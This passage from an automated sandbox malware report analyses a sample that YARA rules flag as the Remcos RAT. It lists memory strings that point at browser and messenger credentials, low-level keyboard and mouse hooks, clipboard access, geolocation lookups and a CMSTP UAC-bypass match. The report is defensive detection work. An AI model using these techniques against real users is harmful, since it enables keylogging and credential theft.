d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
                Source: graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: graias.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: graias.exe, 00000026.00000002.2107594386.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: graias.exe, 00000026.00000002.2107594386.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
                Source: bhvC4F2.tmp.38.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvC4F2.tmp.38.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvC4F2.tmp.38.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvC4F2.tmp.38.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvC4F2.tmp.38.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: graias.exe, 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, iGhDjzEiDU.exe, 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: bhvC4F2.tmp.38.drString found in binary or memory: http://ocsp.digicert.com0
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chromecache_157.13.drString found in binary or memory: http://schema.org/Organization
                Source: iGhDjzEiDU.exe, 00000000.00000002.1684799990.0000000003141000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000006.00000002.1717497130.0000000002BB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: graias.exe, 00000026.00000002.2105157332.0000000000D73000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: chpC919.tmp.38.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://aka.ms/certhelp
                Source: chromecache_157.13.dr, chromecache_191.13.drString found in binary or memory: https://aka.ms/feedback/report?space=61
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://aka.ms/msignite_docs_banner
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://aka.ms/pshelpmechoose
                Source: chromecache_157.13.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
                Source: chromecache_157.13.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
                Source: chromecache_157.13.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
                Source: chpC919.tmp.38.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chpC919.tmp.38.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chpC919.tmp.38.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://channel9.msdn.com/
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
                Source: chpC919.tmp.38.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: chpC919.tmp.38.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chpC919.tmp.38.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/Thraka
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/Youssef1313
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/adegeo
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://github.com/dotnet/try
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/gewarren
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://github.com/js-cookie/js-cookie
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/mairaw
                Source: chromecache_157.13.drString found in binary or memory: https://github.com/nschonni
                Source: chromecache_157.13.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
                Source: graias.exe, 00000026.00000002.2106207732.000000000100F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: graias.exe, 00000026.00000002.2106207732.000000000100F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: graias.exe, 00000026.00000002.2107594386.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                Source: graias.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
                Source: chromecache_190.13.drString found in binary or memory: https://schema.org
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
                Source: chromecache_190.13.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
                Source: chpC919.tmp.38.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: graias.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: chpC919.tmp.38.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000005_2_004099E4
                Installs a global keyboard hook
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Graias\graias.exe
                Source: C:\Windows\SysWOW64\dxdiag.exeWindows user hook set: 0 mouse low level C:\Windows\System32\dinput8.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,38_2_0040987A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,38_2_004098E2
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,39_2_00406DFC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,39_2_00406E9F
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,41_2_004068B5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,41_2_004072B5
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,5_2_00409B10
                Source: C:\Windows\SysWOW64\dxdiag.exeWindows user hook set: 0 mouse low level C:\Windows\System32\dinput8.dll
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041BB81 SystemParametersInfoW,5_2_0041BB81
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041BB87 SystemParametersInfoW,5_2_0041BB87

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
